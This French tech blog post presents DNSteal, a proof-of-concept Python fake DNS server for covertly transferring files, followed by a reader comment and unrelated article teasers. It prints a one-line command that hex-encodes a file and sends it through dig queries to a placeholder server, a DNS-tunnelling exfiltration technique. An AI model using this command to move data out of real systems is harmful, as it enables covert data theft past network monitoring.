Korben, roi d’internet, logo bébé avec des lunettes en mode thug life Korben, roi d’internet, logo bébé avec des lunettes en mode thug life

Korben Upgrade your mind

Transférer des fichiers en utilisant des requêtes DNS

Voici un proof of concept intéressant qui s’appelle DNSteal et qui permet de transférer des documents via le net, de manière très discrète en utilisant le protocole DNS. DNSteal est un script python qui fait office de faux serveur DNS et qui peut recevoir en entrée des fichiers.

Une fois en place, il suffit par exemple de lancer la commande suivante pour transférer l’image send.png au faux serveur DNS.

for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done

C’est plutôt rigolo non ?

dnssteal

DNSteal supporte aussi le transfert multi-fichiers et la compression de ceux-ci. Son développeur s’est fait plaisir 🙂

Si vous voulez plus d’infos, c’est sur Github que ça se passe.


Réponses notables

  1. Spleen says:

    Je vois pas à quoi ça peut vraiment servir. Mais c’est marrant :stuck_out_tongue:

Continuer la discussion sur Korben Communauté

2 commentaires supplémentaires dans les réponses

Participants

Comment découper une carte SIM sans la bousiller

vec certains téléphone, ça devient une vraie galère au niveau des cartes SIM. Entre la SIM classique (MiniSIM), la MicroSIM et la NanoSIM, difficile de s’y retrouver et surtout de passer d’une plus grande à une plus petite sans devoir attendre que les opérateurs veuillent bien se donner la peine de vous l’envoyer…

Lire la suite


6 outils pour cloner un disque dur sous Windows et Linux

Cloner c’est facile… Bon, ok, cloner un bébé, c’est déjà plus complexe mais un disque dur, c’est l’enfance de l’art… Alors bien sûr le logiciel le plus connu pour ça, est Ghost de Symantec mais au prix de 999,99 euros HT (j’déconne, je ne connais pas le prix en vrai), c’est déjà plus rentable de se mettre à cloner son petit frère artisanalement dans le garage…

Lire la suite